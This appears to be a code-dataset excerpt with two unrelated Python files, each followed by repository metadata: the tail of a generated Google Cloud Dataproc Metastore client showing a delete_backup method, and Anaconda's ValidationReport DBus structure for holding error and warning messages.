if not isinstance(request, metastore.DeleteBackupRequest):
request = metastore.DeleteBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_backup]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
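
    # Hedged usage sketch (hypothetical resource name):
    #
    #     operation = client.delete_backup(
    #         name="projects/my-project/locations/us-central1/services/my-service/backups/my-backup"
    #     )
    #     operation.result()  # resolves to Empty once the deletion completes
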
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-metastore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("DataprocMetastoreClient",)
| apache-2.0 | -2,842,710,492,423,436,000 | 42.184152 | 171 | 0.611713 | false | 4.744697 | false | false | false |
sgallagher/anaconda | pyanaconda/modules/common/structures/validation.py | 6 | 1962 | #
# DBus structures for validation.
#
# Copyright (C) 2019 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from dasbus.structure import DBusData
from dasbus.typing import * # pylint: disable=wildcard-import
__all__ = ["ValidationReport"]
class ValidationReport(DBusData):
"""The validation report."""
def __init__(self):
self._error_messages = []
self._warning_messages = []
def is_valid(self):
"""Is the validation successful?
:return: True or False
"""
return not self._error_messages
def get_messages(self):
"""Get all messages.
:return: a list of strings
"""
return self.error_messages + self.warning_messages
@property
def error_messages(self) -> List[Str]:
"""List of error messages.
:return: a list of strings
"""
return self._error_messages
@error_messages.setter
def error_messages(self, messages: List[Str]):
self._error_messages = list(messages)
@property
def warning_messages(self) -> List[Str]:
"""List of warning messages.
:return: a list of strings
"""
return self._warning_messages
@warning_messages.setter
def warning_messages(self, messages: List[Str]):
self._warning_messages = list(messages)
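
# Minimal usage sketch (illustrative messages only):
#
#     report = ValidationReport()
#     report.error_messages = ["Mount point /boot is required."]
#     report.warning_messages = ["Partition sda1 will be reformatted."]
#
#     if not report.is_valid():
#         print("\n".join(report.get_messages()))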
| gpl-2.0 | -5,752,579,340,876,340,000 | 27.852941 | 71 | 0.66106 | false | 4.139241 | false | false | false |